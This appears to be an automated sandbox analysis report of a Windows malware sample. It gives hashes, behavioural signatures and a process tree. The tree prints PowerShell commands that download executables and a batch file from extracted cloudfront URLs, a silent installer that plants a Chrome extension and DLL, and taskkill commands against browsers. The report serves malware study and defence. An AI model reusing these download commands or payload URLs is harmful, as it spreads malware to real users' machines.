Analysis
-
max time kernel
247s -
max time network
299s -
platform
windows10-1703_x64 -
resource
win10-20240404-en -
resource tags
arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system -
submitted
16/05/2024, 22:59
Static task
static1
Behavioral task
behavioral1
Sample
3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
Resource
win7-20240508-en
General
-
Target
3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe
-
Size
49KB
-
MD5
213c0265511727869c959abd24ea3677
-
SHA1
22ea6fe23eeb57d0048d1b0e2a826dd66c6969d9
-
SHA256
3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7
-
SHA512
bfa4d229ade2e47d91f3fb761e68f727aab86980a2697cb06955324e9b61b384569a285edfaa1d1dd7aea95e24d171a770a4f573a19ec795325c68250720f41e
-
SSDEEP
1536:XferrLkSRoe8C4UZsys0Dh1duFpxFI+PlZ:Xfi3k+oWDBDh1duFpkWlZ
Malware Config
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000
Extracted
https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000
Signatures
-
Blocklisted process makes network request 5 IoCs
flow pid Process 16 888 powershell.exe 18 2124 powershell.exe 20 2124 powershell.exe 24 1496 powershell.exe 26 1496 powershell.exe -
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
pid Process 5016 i0.exe 4132 i0.tmp -
Loads dropped DLL 1 IoCs
pid Process 4676 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 30 checkip.amazonaws.com 29 checkip.amazonaws.com -
Drops file in System32 directory 1 IoCs
description ioc Process File created C:\Windows\system32\shlwapi_p.dll i0.tmp -
Drops file in Program Files directory 9 IoCs
description ioc Process File created C:\Program Files\Google\Chrome\Application\chrome.exe.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Online Security\unins000.dat i0.tmp File created C:\Program Files\Online Security\is-IHBLU.tmp i0.tmp File opened for modification C:\Program Files\Online Security\unins000.dat i0.tmp File opened for modification C:\Program Files\Google\Chrome\Application\dlls\dlls.manifest i0.tmp File created C:\Program Files\Google\Chrome\Application\dlls\Shlwapi.dll i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\security.crx i0.tmp File created C:\Program Files\Google\Chrome\Application\Extensions\updates.xml i0.tmp -
pid Process 888 powershell.exe 2124 powershell.exe 1496 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Kills process with taskkill 2 IoCs
pid Process 3420 taskkill.exe 2088 taskkill.exe -
Script User-Agent 3 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 22 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 30 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 32 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 9 IoCs
pid Process 888 powershell.exe 888 powershell.exe 888 powershell.exe 2124 powershell.exe 2124 powershell.exe 2124 powershell.exe 1496 powershell.exe 1496 powershell.exe 1496 powershell.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
description pid Process Token: SeDebugPrivilege 888 powershell.exe Token: SeDebugPrivilege 2124 powershell.exe Token: SeDebugPrivilege 1496 powershell.exe Token: SeDebugPrivilege 3420 taskkill.exe Token: SeDebugPrivilege 2088 taskkill.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 4132 i0.tmp -
Suspicious use of WriteProcessMemory 30 IoCs
description pid Process procid_target PID 4676 wrote to memory of 4860 4676 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe 73 PID 4676 wrote to memory of 4860 4676 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe 73 PID 4676 wrote to memory of 4860 4676 3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe 73 PID 4860 wrote to memory of 888 4860 cmd.exe 75 PID 4860 wrote to memory of 888 4860 cmd.exe 75 PID 4860 wrote to memory of 888 4860 cmd.exe 75 PID 4860 wrote to memory of 2124 4860 cmd.exe 76 PID 4860 wrote to memory of 2124 4860 cmd.exe 76 PID 4860 wrote to memory of 2124 4860 cmd.exe 76 PID 4860 wrote to memory of 5016 4860 cmd.exe 77 PID 4860 wrote to memory of 5016 4860 cmd.exe 77 PID 4860 wrote to memory of 5016 4860 cmd.exe 77 PID 4860 wrote to memory of 1496 4860 cmd.exe 78 PID 4860 wrote to memory of 1496 4860 cmd.exe 78 PID 4860 wrote to memory of 1496 4860 cmd.exe 78 PID 5016 wrote to memory of 4132 5016 i0.exe 79 PID 5016 wrote to memory of 4132 5016 i0.exe 79 PID 5016 wrote to memory of 4132 5016 i0.exe 79 PID 4132 wrote to memory of 2148 4132 i0.tmp 80 PID 4132 wrote to memory of 2148 4132 i0.tmp 80 PID 2148 wrote to memory of 2224 2148 cmd.exe 82 PID 2148 wrote to memory of 2224 2148 cmd.exe 82 PID 2224 wrote to memory of 3268 2224 chrome.exe 83 PID 2224 wrote to memory of 3268 2224 chrome.exe 83 PID 4132 wrote to memory of 4200 4132 i0.tmp 84 PID 4132 wrote to memory of 4200 4132 i0.tmp 84 PID 4132 wrote to memory of 3420 4132 i0.tmp 86 PID 4132 wrote to memory of 3420 4132 i0.tmp 86 PID 4132 wrote to memory of 2088 4132 i0.tmp 89 PID 4132 wrote to memory of 2088 4132 i0.tmp 89
Processes
-
C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"C:\Users\Admin\AppData\Local\Temp\3b73d0b40752af41cdaa397c87f039167f0a1c9ff8ea6623fc8a8cb4ca787ca7.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Windows\SysWOW64\cmd.exe"cmd" /c "C:\Users\Admin\AppData\Local\Temp\nss66D9.tmp\est.bat"2⤵
- Suspicious use of WriteProcessMemory
PID:4860 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/th.php?a=2836&c=1000','stat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:888
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "(New-Object Net.WebClient).DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=458&c=1000','i0.exe')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2124
-
-
C:\Users\Admin\AppData\Local\Temp\i0.exei0.exe /verysilent /sub=10003⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:5016 -
C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp"C:\Users\Admin\AppData\Local\Temp\is-TDRD6.tmp\i0.tmp" /SL5="$C01FE,2859366,899584,C:\Users\Admin\AppData\Local\Temp\i0.exe" /verysilent /sub=10004⤵
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:4132 -
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""5⤵
- Suspicious use of WriteProcessMemory
PID:2148 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application/chrome.exe" --pack-extension=C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\lazyhh6⤵
- Suspicious use of WriteProcessMemory
PID:2224 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=106.0.5249.119 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7fffd6b39758,0x7fffd6b39768,0x7fffd6b397787⤵PID:3268
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" "C:\Windows\system32\cmd.exe" /S /C ""openssl.exe" rsa -in .\lazyhh.pem -pubout -outform DER > "C:\Users\Admin\AppData\Local\Temp\is-4H0NV.tmp\~execwithresult.txt""5⤵PID:4200
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "msedge.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:3420
-
-
C:\Windows\SYSTEM32\taskkill.exe"taskkill.exe" /f /im "chrome.exe"5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2088
-
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "$cli = New-Object System.Net.WebClient;$cli.Headers['User-Agent'] = 'InnoDownloadPlugin/1.5';$cli.DownloadFile('https://d2iv78ooxaijb6.cloudfront.net/load/dl.php?id=444&c=1000', 'i2.bat')"3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1496
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD566382a4ca6c4dcf75ce41417d44be93e
SHA18132cbef1c12f8a89a68a6153ade4286bf130812
SHA256a70acce0f4c6ab59b88ce79d84c38d4abffe19b72b033250499b17d788a2db56
SHA5122bf66f2850f4a65220085c55a5b3c8866453104d78fe516e5bd6e3e47df783062ce4ea10de580f2eb0274ac8c3ce71965201c49ef55a78f307731ccc8600aadc
-
Filesize
16KB
MD55c68c9f562003c17ef7606c9ec3789ea
SHA166397a728a9bdbe4dda6796d3f4670300433d6cd
SHA256323e5ed61ef0ddf5995aba2092d907463d4980dcb72a469c527d1a7edf7ca00e
SHA512dbea214e38214c2fc5091b84f9d8c51b54f4fe91625f4e0852abcee1cd8f31efe43cb84b29f561d17afb4f87c3883c4278e28fb4ded9741b17df5ddd49b7280e
-
Filesize
16KB
MD57fd04a079b5a2ce1e7be3b700b797de7
SHA1753d12f778fa6347e21db7dd139914be636960fb
SHA2562279f0d46c92d5a5d27a1e8c8d56427f4a5cf2d84a2461135fbacaca38f49e94
SHA5129ebe29dde0293201d3b67fa45696d0b363c0f1abf575faa9182a584b4448856df8538b4a4cbe33dfe4c2d454036dc80f0aa16cadb2986dac83e2fe299cd42631
-
Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
Filesize
3.5MB
MD5b80362872ea704846e892f16aab924c3
SHA1222b36b97d7978929c6fd2d3b1ff8bd8504a5a33
SHA256d42c001c3cf58d276a5bf52eb8a56158343676a18952b94d6de8c1e8127bf91e
SHA512beadabff22437031fd2df2748527f60d67249abefa1afdedef233ce56ad54cb675835c849ecaa8248e0e2e597b13754b0c0611504818e700a59b4727fb4bc7a5
-
Filesize
47KB
MD552311257a997455c0a32e1679e0b614e
SHA1395c475df7403e12651c8b6b1d52c33e5d7f3320
SHA25650a78e3d21eea2c5a784eca08d5b4b0f2e4684fe8194a5bf0304c8ca6b18bddd
SHA51219488ccb7d6cbf5e33ab492bd23bcdcd2edaa739ee808c4c5337fb27a0eb4e2632f2af6b2c8546127e20ac2d7a9cd94ffaa833d404fba0ab11ef7e0b301268a0
-
Filesize
208B
MD5963fb7657217be957d7d4732d892e55c
SHA1593578a69d1044a896eb8ec2da856e94d359ef6b
SHA2561d4a8c5e18d7a189036f1074ffae7927b0450864f5c8622a44205e04ef13ce12
SHA512f875fa56bcda6299681d2ca2852d5ae04504b1df8d8824170215d4c136a568fc2548ada88ea75178ce23b4649f1713a863926c4d02125cb29475251bf5781fdd
-
Filesize
49KB
MD5c8db22fe07b974833ff49b34ab65357d
SHA184f5dfd305c643e5df0b6866aa86d68aaad8c018
SHA256820d53b44c4bf729ac20aa274e0a2c6720f841eddd42b90984b60d035dd3b68c
SHA512d48ecb450233518e0244e99600e2c51e503692e133284cfd3932ea1c24cbafc08d4b05584e5b09ff5e6b114d1accde55a70b600620d26fad0446c476fafe9b6c
-
Filesize
1KB
MD5650bce794d69267d2219e7b1d2255c9d
SHA1483e2097dea5b62c2d4c7a5b35a58a62f9fb4fb8
SHA256e5061abe30c74dbd5e96fa4a403f83cf5388325f3d73a25ae43808caad6ad898
SHA51284d4d02678d9f171f90e58777dd0502088bf2e600e1d3b149b8c9aa2bb549d6ddbfda912383179cf6606499fd371e88d9e2b7f021a7bdd322a4662265b7a26e7
-
Filesize
8KB
MD5d57a101cf48bd00b5297596c081ece42
SHA147be9ca3d2a57788957bb6f91d9a6886c4252c0f
SHA256a47dfbb6b7b40189b6cbed618537292e8e447bf376d37b34c4b38e87bf398bf5
SHA5127110cf64ee0cabe13d49a31b84e5efecee89acb393cceff1d5ab9f18a2fbcd7930008fbcfe94b5324d35b90ce7102dcb62e14f81614dd579a64ba4ba8d339eb5
-
Filesize
3KB
MD5ca00972a17d51a3e6a28cfc8711474e4
SHA1c806ba3bcfb0b785aa4804843d332f425c66b7e0
SHA256fb5b73939e6a24b68f5780168cbef56c520a95c86b3daf0d6ae3fd6f70ead1aa
SHA5129731e6e583fdcb148f3ed46daa1749a8217124541f2f925b10692100488e30ab50bf6e212b9a4a335d25c673381b11604ddb72830d502589d431342685277516
-
Filesize
108KB
MD5432c4c1300ba1c077fbd681f9667a104
SHA133482cd9df3a5ae20ad7f978f51bd35d2453c9ba
SHA256adeb84b81042b094ffcfd21ca8c8c33b1a031ef02dc6a64604393197ff075f04
SHA5120ab8f623e52550e8c06b385080cbfbe5377d0d718094d2c9436d910b17d86f9dcc4c722da419705604f38d26cdd0b524ef64d27abc58a66c9b24b660275cd2ad
-
Filesize
438B
MD51d47eb945d1299c0e53bcada476d32b3
SHA1509f9041f7e2a14402915feb4f2a739cfac5636b
SHA2560a40fc9c57498f6fa92f5d52688f3cf55ecc607d7d91be7997412105def9278a
SHA5126d20d3855225ee48373ee1ae19d5cecf90951a507c9c1d23d86fe0bb4f73def9545f0fd18ce821a3d63fa636b06d08a52a41c0f3a3cb2edc20d8ef92919b4258
-
Filesize
3.1MB
MD5bdf5432c7470916ab3c25f031c4c8d76
SHA14762eeae811cfad7449a3d13fb1d759932c6d764
SHA25672f7dbc5502cfce6de9184df4466a84fbbaa828048a183b0eb1690e79c886903
SHA51233ff33582f75a67602233860d3057122a4f893d3ec3b58204617660ec46d1afd25657047f364c06f727e1604907e9cb740dc847b992249d0656100308c4bedde
-
Filesize
735B
MD5a07717f85edfb2fc3451641332db0216
SHA1869a9d192d0a7dbf3aa1f1f22aaee14e0af6b213
SHA2561a43e74b5a0de7183931ff4875993d780641c5fa0016fd6f3992490f64333e89
SHA5120c16f2fe3d907ca391e52212cdfb9dab863a6d501e1d92c977f07e7fe392321948e6ad7e20e45cd8fe370b0d35049a56bde2dc5bf2ad50535f594eeccea3041a
-
Filesize
25KB
MD540d7eca32b2f4d29db98715dd45bfac5
SHA1124df3f617f562e46095776454e1c0c7bb791cc7
SHA25685e03805f90f72257dd41bfdaa186237218bbb0ec410ad3b6576a88ea11dccb9
SHA5125fd4f516ce23fb7e705e150d5c1c93fc7133694ba495fb73101674a528883a013a34ab258083aa7ce6072973b067a605158316a4c9159c1b4d765761f91c513d